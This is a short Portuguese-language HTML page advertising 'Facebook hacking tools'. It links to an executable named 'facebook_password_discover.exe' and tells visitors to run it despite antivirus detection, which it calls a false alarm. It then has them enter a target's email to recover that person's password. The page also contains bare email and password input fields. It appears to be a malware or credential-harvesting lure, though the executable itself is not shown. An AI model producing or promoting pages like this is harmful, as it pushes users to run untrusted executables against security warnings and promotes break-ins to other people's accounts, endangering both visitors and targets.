<html>
<head>
	<title> facebook hacking tools </title>
</head>
<body>
	<table>
		<tr>
			<td>
				<img src="log.png" width=100 height=100>
			</td>
			<td>
				<font size=5>Facebook hacking tools
			</td>
		</tr>
	</table>
	<h1>Download</h1>
	<br>
	<a href="facebook_password_discover.exe">Facebook Password Discover</a>
	<hr>
	<blockquote>
	Efetue o download do programa para o seu PC e execute a mesma. Confirme que pretende executar o programa no Windows, embora possa ser detetado como (falso) virus. 

	Insira o email do alvo. Depois de executar o programa espere alguns minutos (por vezes horas).

	A password aparece nesse periodo de tempo
	</blockquote>
	<br><br>
	<table>
		<tr>
			<td>
				email
			</td>
			<td>
	 			<input type="text">
	 		</td>
	 	</tr>
	 	<tr>
	 		<td>
	 			palavra passe
	 		</td>
	 		<td>
	 			<input type="text">
	 		</td>
	 	</tr>
	</table>
</body>
</html>
